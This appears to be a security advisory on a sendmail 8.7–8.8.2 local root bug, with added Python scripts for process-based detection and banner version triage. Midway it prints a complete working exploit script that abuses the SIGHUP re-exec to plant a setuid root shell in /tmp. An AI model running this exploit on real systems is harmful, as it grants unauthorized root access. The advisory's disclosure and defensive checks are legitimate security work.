COMMAND

    sendmail

SYSTEMS AFFECTED

    Systems running sendmail 8.7-8.8.2

PROBLEM

    Sendmail is often run in daemon mode so that it can "listen" for
    incoming mail connections on the standard SMTP networking port,
    usually port 25. The root user is the only user allowed to start
    sendmail this way, and sendmail contains code intended to enforce
    this restriction.

    Unfortunately, due to a coding error, sendmail can be invoked in
    daemon mode in a way that bypasses the built-in check. When the
    check is bypassed, any local user is able to start sendmail in
    daemon mode. In addition, as of version 8.7, sendmail will
    restart itself when it receives a SIGHUP signal. It does this
    restarting operation by re-executing itself using the exec(2)
    system call. Re-executing is done as the root user. By
    manipulating the sendmail environment, the user can then have
    sendmail execute an arbitrary program with root privileges. In
    other words, local users can gain root privileges on the local
    machine.
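    From the defender's side, the re-exec described above has a visible
    footprint: a process running as root whose argv[0] points into a
    world-writable directory, or an MTA-named root process whose path is
    not the trusted install location. The following Python script is an
    added example (not part of the original advisory) that runs that
    heuristic over a constructed sample of `ps -axo user,pid,args` output;
    the trusted and untrusted directory sets are assumptions to adjust per
    platform.

```python
from typing import List, Tuple

# Constructed sample of `ps -axo user,pid,args` output (not captured from a real host).
# PID 4711 is what the root re-exec described above would look like: sendmail
# restarted itself using an argv[0] that points into /tmp.
SAMPLE_PS = """\
USER     PID COMMAND
root       1 /sbin/init
root     112 /usr/sbin/sendmail -bd -q30m
root     233 sendmail: accepting connections
leshka  4705 ./leshka
root    4711 /tmp/smtpd
root    4801 /home/leshka/bin/sendmail -bd
"""

# Directories any local user can write to (assumption: typical BSD/Linux layout).
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Where a legitimate sendmail binary is expected to live (assumption; adjust per platform).
TRUSTED_MTA_DIRS = {"/usr/sbin", "/usr/lib", "/usr/libexec"}
MTA_NAMES = {"sendmail", "smtpd"}

REASON_WORLD_WRITABLE = "root process started from a world-writable directory"
REASON_UNTRUSTED_PATH = "MTA-named root process outside the trusted install path"


def parse_ps(text: str) -> List[Tuple[str, int, str]]:
    """Split ps output into (user, pid, args) tuples, skipping the header line."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[1].isdigit():
            continue  # header or malformed line
        user, pid, args = parts
        procs.append((user, int(pid), args))
    return procs


def flag_suspicious(text: str) -> List[Tuple[int, str, str]]:
    """Return (pid, argv0, reason) for root processes whose argv[0] is not where an MTA belongs."""
    findings = []
    for user, pid, args in parse_ps(text):
        if user != "root":
            continue
        argv0 = args.split()[0]
        if not argv0.startswith("/"):
            # Process titles such as "sendmail: accepting connections" carry no path;
            # nothing to judge here.
            continue
        directory, _, base = argv0.rpartition("/")
        if argv0.startswith(UNTRUSTED_PREFIXES):
            findings.append((pid, argv0, REASON_WORLD_WRITABLE))
        elif base in MTA_NAMES and directory not in TRUSTED_MTA_DIRS:
            findings.append((pid, argv0, REASON_UNTRUSTED_PATH))
    return findings


if __name__ == "__main__":
    for pid, argv0, reason in flag_suspicious(SAMPLE_PS):
        print(f"pid {pid}: {argv0} -- {reason}")
```

    On the sample input the script reports PID 4711 (/tmp/smtpd) and
    PID 4801 (a sendmail binary outside the trusted path). The check only
    sees argv[0], which a running process can rewrite, so treat a hit as a
    reason to inspect the process, not as proof on its own.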

    The following is an exploit for the sendmail smtpd bug (versions
    8.7-8.8.2 on FreeBSD, Linux and possibly other platforms). The
    shell script leaves a root shell in the /tmp directory.


#-------------------------------- CUT HERE -------------------------------------
#!/bin/sh
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
# leshka.c: starts sendmail with argv[0] set to /tmp/smtpd, the name
# sendmail re-executes as root on SIGHUP (see PROBLEM above).
#
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
# smtpd.c: what gets re-executed; it copies /bin/sh into /tmp as a setuid root shell.
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
# Build both, start the daemon, send it SIGHUP, clean up, run the resulting shell.
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
#-------------------------------- CUT HERE -------------------------------------

SOLUTION

    Install a patch from your vendor if one is available or upgrade to
    the current version of sendmail. Also take additional precautions
    such as:

        * Use the sendmail restricted shell program (smrsh)
        * Use mail.local

    Alternatively, get qmail or zmailer. By the way, the new sendmail
    (8.8.3 at the time of writing) can be found on
    ftp.sendmail.org:/pub/sendmail. For how long?
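    A quick way to find hosts that still need the upgrade is to read the
    version sendmail advertises in its SMTP greeting and compare it with
    the affected range above. The Python below is an added example (not
    part of the original advisory) that does that comparison over a few
    constructed banner lines; the banner format and the inclusive
    8.7 to 8.8.2 range are taken from the advisory, the host names are made up.

```python
import re
from typing import Optional, Tuple

# Version range the advisory names as affected (inclusive on both ends).
AFFECTED_MIN = (8, 7)
AFFECTED_MAX = (8, 8, 2)
# The release the advisory points to as current and fixed.
FIXED_VERSION = (8, 8, 3)

# Constructed SMTP greetings in sendmail's usual
# "220 host ESMTP Sendmail <version>/<config version>; <date>" form.
SAMPLE_BANNERS = [
    "220 mail.example.com ESMTP Sendmail 8.8.2/8.8.2; Mon, 4 Nov 1996 10:15:02 -0500",
    "220 relay.example.net ESMTP Sendmail 8.8.3/8.8.3; Tue, 5 Nov 1996 09:01:44 +0100",
    "220 old.example.org Sendmail 8.6.12/8.6.12 ready at Wed, 6 Nov 1996 08:00:00 GMT",
    "220 other.example.com ESMTP Postfix",
]

_VERSION_RE = re.compile(r"\bSendmail (\d+(?:\.\d+)*)")


def parse_sendmail_version(banner: str) -> Optional[Tuple[int, ...]]:
    """Extract the sendmail version from a 220 greeting as an int tuple, or None."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_affected(version: Tuple[int, ...]) -> bool:
    """True when the version falls inside the advisory's 8.7 .. 8.8.2 range.

    Tuple comparison handles missing trailing components: (8, 7) <= (8, 7, 6).
    """
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def assess(banner: str) -> str:
    """Classify a banner as 'affected', 'not-affected' or 'unknown'."""
    version = parse_sendmail_version(banner)
    if version is None:
        return "unknown"
    return "affected" if is_affected(version) else "not-affected"


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        version = parse_sendmail_version(banner)
        label = ".".join(map(str, version)) if version else "n/a"
        print(f"{banner.split()[1]:24s} sendmail {label:8s} {assess(banner)}")
```

    The banner is only what the server chooses to announce; a vendor
    patch may leave the version string unchanged, and an administrator
    may strip it. Use the check to triage a fleet, then confirm on the
    host itself against the vendor's patch record.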